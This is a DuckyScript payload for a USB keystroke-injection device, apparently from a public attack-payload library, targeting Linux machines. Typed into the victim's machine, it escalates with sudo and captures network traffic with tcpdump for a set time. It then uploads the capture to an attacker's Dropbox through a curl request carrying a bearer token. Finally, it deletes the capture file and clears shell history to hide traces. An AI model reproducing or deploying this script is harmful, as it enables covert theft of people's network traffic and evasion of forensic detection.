Path: blob/master/payloads/library/exfiltration/ExfiltrateNetworkTraffic_Linux/payload.txt
2968 views
1REM #############################################2REM # |3REM # Title : Exfiltrate Network Traffic |4REM # Author : Aleff |5REM # Version : 1.0 |6REM # Category : Exfiltration |7REM # Target : Linux |8REM # |9REM #############################################1011REM Requirements:12REM - Permissions13REM - Internet Connection1415REM REQUIRED: You need to know the sudo password and replace 'example' with this16DEFINE SUDO_PASS example17REM REQUIRED: Set what you want to sniff, for example tcp port 8018DEFINE SNIFFING example19REM Set your Dropbox link or whatever you want to use to exfiltrate the sniff file20DEFINE TOKEN example21REM Just a Dropbox const22DEFINE DROPBOX_API_CONST https://content.dropboxapi.com/2/files/upload23REM Output file path packets.pcap, remember to use pcap extension24DEFINE FILE example.pcap252627DELAY 100028CTRL-ALT t29DELAY 2000303132REM #### PERMISSIONS SECTION ####333435STRINGLN sudo su36DELAY 100037STRINGLN SUDO_PASS38DELAY 1000394041REM #### Network Traffic SECTION ####424344STRING FILE_PATH="45STRING FILE46STRING "47ENTER48DELAY 5004950STRING filter_expression="51STRING SNIFFING52STRING "53ENTER54DELAY 5005556REM Network card name57STRINGLN net_card="$(ip route get 8.8.8.8 | awk '{ print $5; exit }')"58DELAY 5005960REM Network dump61STRINGLN tcpdump -i "$net_card" $filter_expression -w "$FILE_PATH" &62DELAY 5006364REM Get PID65STRINGLN tcpdump_pid=$!6667REM Set how long you want to sniff68DELAY 600006970REM Kill the process by PID71STRINGLN kill $tcpdump_pid727374REM #### Exfiltrate SECTION ####75REM You can use whatever you want, i use Dropbox7677STRING ACCESS_TOKEN="78STRING TOKEN79STRING "80ENTER81DELAY 5008283STRINGLN DROPBOX_FOLDER="/Exfiltration"84DELAY 5008586STRING curl -X POST87STRING DROPBOX_API_CONST88STRING --header "Authorization: Bearer $ACCESS_TOKEN" --header "Dropbox-API-Arg: {\"path\": \"$DROPBOX_FOLDER\",\"mode\": \"add\",\"autorename\": true,\"mute\": false}" --header "Content-Type: application/octet-stream" --data-binary "@$FILE_PATH"89ENTER909192REM #### REMOVE TRACES ####939495STRINGLN rm "$FILE_PATH"96DELAY 5009798STRINGLN history -c99DELAY 500100101REM Exit from Sudo user102STRINGLN exit103DELAY 500104105REM Close the shell106STRINGLN exit107108109